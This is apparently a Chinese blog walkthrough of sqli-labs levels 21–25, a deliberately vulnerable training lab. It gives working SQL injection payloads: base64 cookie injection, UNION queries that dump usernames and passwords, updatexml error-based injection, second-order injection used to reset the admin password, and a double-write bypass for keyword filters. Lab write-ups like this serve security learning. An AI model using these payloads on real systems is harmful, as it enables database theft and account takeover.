二十一:less=21
1.实际上本关和20关是一样的,只是需要进行base64编码,老规矩,使用dakkan,1进行登录并且使用burpsuit进行抓包并且把包放入重放器里面。
2.同时,在源码中我们也可以看到,它其实输出了查询之后的信息,所以这里我们自然可以想到使用联合查询注入,以及在输出报错信息时,我们也可以使用报错注入,布尔以及时间盲注自然也可以。这里我们进行修改,由于本关闭合方式是’)进行闭合,所以这里我们准备传入aaa')来进行测试,首先我们需要对aaa')进行编码。
选择base64进行编译
这里可以看到有个明显的报错,我们也就找到了注入点,即cookie,所以这里我们也可以使用报错注入其实,我们先来看联合查询。
3.爆破数据库名称
aaa') union select 1,database(),version()#
4.爆出数据库表名
aaa') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'#
5.爆出user表的列名
aaa') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'#
6.爆出数据
aaa') union select 1,group_concat(username,0x3a,password),3 from users#
二十二.less=22
1.老规矩,使用admin,admin进行登录,并使用burpsuit进行抓包并且放入重放器里。
这里我们进行修改,由于本关闭合方式是"进行闭合,所以这里我们准备传入1"来进行测试,首先我们需要对1"进行编码,复制到cookie里面进行测试,点击发送观察回显。
这里可以看到有个明显的报错,我们也就找到了注入点,即cookie.
2.爆出数据库名称
aaa" union select 1,database(),version()#
3.爆出数据库的所有表名。
aaa" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'#
4.爆出user表的列名
aaa" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'#
5.爆出数据
aaa" union select 1,group_concat(username,0x3a,password),3 from users#
二十三.less=23
1.我们先使用id=1进行测试
考虑联合注入,在输入单引号试试
也得考虑报错注入,我们还可以考虑用闭合的方式进行注入。
2.使用updatexml进行报错注入。
获取数据库名称
?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1' = '1
3.获取数据库的表名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1' = '1
4.查询user表中的列名
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1' = '1
5.获取数据
?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1) and '1' = '1
二十四.less=24
1.经过测试我们发现是二次注入,二次注入就是构造SQL语句插入到数据库中,然后数据库报错信息被其他SQL语句调用时触发攻击行为。
下面是更新密码的核心语句
UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'
这里应该是存在注入点的,我们把username换成admin’#,那么语句如下
UPDATE users SET PASSWORD='$pass' where username='admin'# and password='$curr_pass'
2.注册一个admin‘#qxl的账号试试看
3.可以看到显示页面跳转
4.在数据库中进行查询
5.使用admin‘#qxl进行登录会弹出以下页面
6.我们找到这个界面,下面我们输入正确的密码admin,然后更改为123456,再次输出123456,点击reset。
7,可以看到密码已经被修改。
二十五.less=25
1.我们看到不能使用and和or,老规矩我们先使用id=1进行测试
接下来我们使用id=1’进行尝试
也可以考虑报错注入
2.使用联合注入进行查询爆破数据库名
?id=-1' union select 1,database(),version()--+
3.爆破数据库表名
?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
我们可以看到中间or被注释,我们采用双写嵌套
?id=-1'union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'--+
4.user表的列名
?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name="users"--+
5.获取数据
?id=-1' union select 1,(select group_concat(username,passwoorrd) from users) ,3--+
1052
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
